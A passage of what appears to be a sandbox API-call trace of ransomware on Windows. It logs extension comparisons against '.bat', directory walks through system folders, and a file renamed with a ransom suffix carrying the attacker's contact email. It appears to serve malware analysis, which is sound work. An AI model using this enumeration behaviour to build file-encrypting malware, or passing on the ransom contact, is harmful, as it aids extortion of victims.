(lpString=".pff") returned 4 [0178.064] lstrcmpiW (lpString1=".pff", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".pfm") returned 4 [0178.064] lstrcmpiW (lpString1=".pfm", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".pfx") returned 4 [0178.064] lstrcmpiW (lpString1=".pfx", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".pgm") returned 4 [0178.064] lstrcmpiW (lpString1=".pgm", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".php") returned 4 [0178.064] lstrcmpiW (lpString1=".php", lpString2=".bat") returned 1 [0178.064] lstrlenW (lpString=".php3") returned 5 [0178.064] lstrcmpiW (lpString1=".php3", lpString2="].bat") returned -1 [0178.065] lstrlenW (lpString=".php4") returned 5 [0178.065] lstrcmpiW (lpString1=".php4", lpString2="].bat") returned -1 [0178.065] lstrlenW (lpString=".php5") returned 5 [0178.065] lstrcmpiW (lpString1=".php5", lpString2="].bat") returned -1 [0178.065] lstrlenW (lpString=".phtml") returned 6 [0178.065] lstrcmpiW (lpString1=".phtml", lpString2="i].bat") returned -1 [0178.065] lstrlenW (lpString=".pict") returned 5 [0178.065] lstrcmpiW (lpString1=".pict", lpString2="].bat") returned -1 [0178.065] lstrlenW (lpString=".pl") returned 3 [0178.065] lstrcmpiW (lpString1=".pl", lpString2="bat") returned -1 [0178.065] lstrlenW (lpString=".pls") returned 4 [0178.065] lstrcmpiW (lpString1=".pls", lpString2=".bat") returned 1 [0178.065] lstrlenW (lpString=".pm") returned 3 [0178.065] lstrcmpiW (lpString1=".pm", lpString2="bat") returned -1 [0178.065] lstrlenW (lpString=".png") returned 4 [0178.065] lstrcmpiW (lpString1=".png", lpString2=".bat") returned 1 [0178.065] lstrlenW (lpString=".pnm") returned 4 [0178.065] lstrcmpiW (lpString1=".pnm", lpString2=".bat") returned 1 [0178.065] lstrlenW (lpString=".pot") returned 4 [0178.065] lstrcmpiW (lpString1=".pot", lpString2=".bat") returned 1 [0178.065] lstrlenW (lpString=".potm") returned 5 [0178.065] lstrcmpiW (lpString1=".potm", lpString2="].bat") returned -1 [0178.065] lstrlenW (lpString=".potx") returned 5 [0178.065] lstrcmpiW (lpString1=".potx", lpString2="].bat") returned -1 [0178.065] lstrlenW (lpString=".ppa") returned 4 [0178.066] lstrcmpiW (lpString1=".ppa", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".ppam") returned 5 [0178.066] lstrcmpiW (lpString1=".ppam", lpString2="].bat") returned -1 [0178.066] lstrlenW (lpString=".ppm") returned 4 [0178.066] lstrcmpiW (lpString1=".ppm", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".pps") returned 4 [0178.066] lstrcmpiW (lpString1=".pps", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".ppsm") returned 5 [0178.066] lstrcmpiW (lpString1=".ppsm", lpString2="].bat") returned -1 [0178.066] lstrlenW (lpString=".ppt") returned 4 [0178.066] lstrcmpiW (lpString1=".ppt", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".pptm") returned 5 [0178.066] lstrcmpiW (lpString1=".pptm", lpString2="].bat") returned -1 [0178.066] lstrlenW (lpString=".pptx") returned 5 [0178.066] lstrcmpiW (lpString1=".pptx", lpString2="].bat") returned -1 [0178.066] lstrlenW (lpString=".prn") returned 4 [0178.066] lstrcmpiW (lpString1=".prn", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".ps") returned 3 [0178.066] lstrcmpiW (lpString1=".ps", lpString2="bat") returned -1 [0178.066] lstrlenW (lpString=".psb") returned 4 [0178.066] lstrcmpiW (lpString1=".psb", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".psd") returned 4 [0178.066] lstrcmpiW (lpString1=".psd", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".pst") returned 4 [0178.066] lstrcmpiW (lpString1=".pst", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".ptx") returned 4 [0178.066] lstrcmpiW (lpString1=".ptx", lpString2=".bat") returned 1 [0178.066] lstrlenW (lpString=".pub") returned 4 [0178.066] lstrcmpiW (lpString1=".pub", lpString2=".bat") returned 1 [0178.067] lstrlenW (lpString=".pwm") returned 4 [0178.067] lstrcmpiW (lpString1=".pwm", lpString2=".bat") returned 1 [0178.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.068] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0178.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.070] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0178.070] FindClose (in: hFindFile=0x69a730 | out: hFindFile=0x69a730) returned 1 [0178.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c50948 | out: hHeap=0x680000) returned 1 [0178.070] FindNextFileW (in: hFindFile=0x69a6f0, lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0178.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.070] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0178.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.071] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x95b8e1dc, ftLastAccessTime.dwHighDateTime=0x1d50396, ftLastWriteTime.dwLowDateTime=0x95b8e1dc, ftLastWriteTime.dwHighDateTime=0x1d50396, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0178.071] FindClose (in: hFindFile=0x69a730 | out: hFindFile=0x69a730) returned 1 [0178.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c50948 | out: hHeap=0x680000) returned 1 [0178.072] FindNextFileW (in: hFindFile=0x69a6f0, lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0178.225] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.225] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0178.226] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.226] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0178.228] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.228] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0178.229] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.230] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0178.232] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.232] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0178.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.233] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0178.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.235] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0178.237] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.237] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0178.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.239] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0178.241] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.241] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0178.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.242] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0178.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.244] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0178.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.245] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0178.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.247] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0178.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.249] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0178.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.251] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0178.253] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.253] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0178.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.335] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0178.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.337] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0178.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.339] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0178.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.340] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0178.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.342] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0178.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.344] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0178.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.347] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0178.349] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.349] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0178.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.351] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdec93ef, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdec93ef, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe020920, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3ff4, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DHTMLH~1.BAT")) returned 1 [0178.353] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.353] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0178.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0178.355] FindNextFileW (in: hFindFile=0x69a8b0, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, 